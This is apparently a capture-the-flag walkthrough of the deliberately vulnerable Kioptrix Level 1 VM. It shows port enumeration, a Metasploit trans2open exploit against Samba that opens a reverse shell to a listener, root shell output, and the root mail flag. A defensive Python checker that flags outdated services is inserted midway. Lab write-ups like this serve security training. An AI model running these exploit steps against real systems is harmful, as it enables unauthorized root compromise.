Difficulty Rating: Coffee

Author Description

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

Service Enumeration

Port      Service      Version Detection
TCP: 22   SSH          OpenSSH 2.9p2 (protocol 1.99)
TCP: 80   HTTP         Apache httpd 1.3.20 ((Unix)
TCP: 111  RPC Bind     N/A
TCP: 139  netbios-ssn  Samba
TCP: 443  HTTPS        Apache httpd 1.3.20 ((Unix)

Samba Enumeration

Based on the age of the system and its other services, I know from experience that Samba is likely vulnerable to the trans2open exploit.

use exploit/linux/samba/trans2open

msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.221.156  yes       The target address
   RPORT  139              yes       The target port


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.221.139  yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
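The enumeration table above and the reasoning about Samba's age can be turned into a repeatable check rather than a gut call. The following is an added example, not part of the original walkthrough and not Metasploit code: it parses a constructed nmap-style service listing (the page's own ports and banners re-entered by hand) and flags the findings a reviewer would raise for this host. The Samba rule encodes the fixed range for trans2open (CVE-2003-0201: Samba 2.2.0 through 2.2.7a are affected, 2.2.8 fixed it); the scan only reports "Samba" with no number, so the script reports the version as unconfirmed instead of guessing. The function and rule names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the page's enumeration table written in nmap's
# "PORT STATE SERVICE VERSION" style. Not real scanner output.
SCAN_OUTPUT = """\
22/tcp  open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp  open  http        Apache httpd 1.3.20 ((Unix)
111/tcp open  rpcbind
139/tcp open  netbios-ssn Samba
443/tcp open  https       Apache httpd 1.3.20 ((Unix)
"""


@dataclass
class Service:
    port: int
    proto: str
    name: str
    version: str  # empty when the scanner reported no version string


LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)(?:\s+(.*))?$")


def parse_scan(text: str) -> List[Service]:
    """Turn one service line per port into Service records; skip noise lines."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        port, proto, name, version = m.groups()
        services.append(Service(int(port), proto, name, (version or "").strip()))
    return services


def samba_trans2open_affected(version: str) -> Optional[bool]:
    """True/False for a known 2.2.x version, None when the version is
    missing or from a branch this rule does not cover.
    Samba 2.2.0 - 2.2.7a are affected by CVE-2003-0201; 2.2.8 fixed it."""
    m = re.search(r"Samba\s+(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    if (major, minor) != (2, 2):
        return None
    return patch < 8


def assess(services: List[Service]) -> List[Tuple[int, str]]:
    """Apply simple rules to each service and return (port, finding) pairs."""
    findings = []
    for s in services:
        v = s.version
        if s.name == "ssh" and "protocol 1.99" in v:
            # 1.99 means the daemon still negotiates SSH protocol 1
            findings.append((s.port, "SSH protocol 1 still enabled; disable SSHv1"))
        if s.name in ("http", "https") and re.search(r"Apache httpd 1\.3\.", v):
            findings.append((s.port, "Apache 1.3.x is end-of-life; no security fixes"))
        if s.name == "netbios-ssn" and v.startswith("Samba"):
            affected = samba_trans2open_affected(v)
            if affected is None:
                findings.append((s.port, "Samba version not disclosed; confirm it is 2.2.8 or later"))
            elif affected:
                findings.append((s.port, "Samba 2.2.x before 2.2.8: trans2open (CVE-2003-0201)"))
    return findings


if __name__ == "__main__":
    for port, msg in assess(parse_scan(SCAN_OUTPUT)):
        print(f"{port}: {msg}")
```

Run stand-alone it prints one line per flagged port; port 111 produces nothing because no rule applies to rpcbind here. Feeding it a banner such as "Samba 2.2.1a" (what this VM actually runs) makes the Samba rule fire with a definite finding instead of the "not disclosed" placeholder.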

Metasploit Exploit

msf exploit(trans2open) > run

[*] [2015.12.20-21:05:39] Started reverse handler on 192.168.221.139:4444
[*] [2015.12.20-21:05:40] Trying return address 0xbffffdfc...
[*] [2015.12.20-21:05:41] Trying return address 0xbffffcfc...
[*] [2015.12.20-21:05:42] Trying return address 0xbffffbfc...
[*] [2015.12.20-21:05:43] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.221.139:4444 -> 192.168.221.156:1025) at 2015-12-20 21:05:44 -0500


^Z
Background session 1? [y/N]  N

id
uid=0(root) gid=0(root) groups=99(nobody)
hostname
kioptrix.level1
^Z
Background session 1? [y/N]  y

Root Flag

sh-2.05# cd /var/spool/mail
cd /var/spool/mail
sh-2.05# ls
ls
harold
john
nfsnobody
root
sh-2.05# cat root   
cat root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <[email protected]>
Received: (from root@localhost)
    by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
    for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...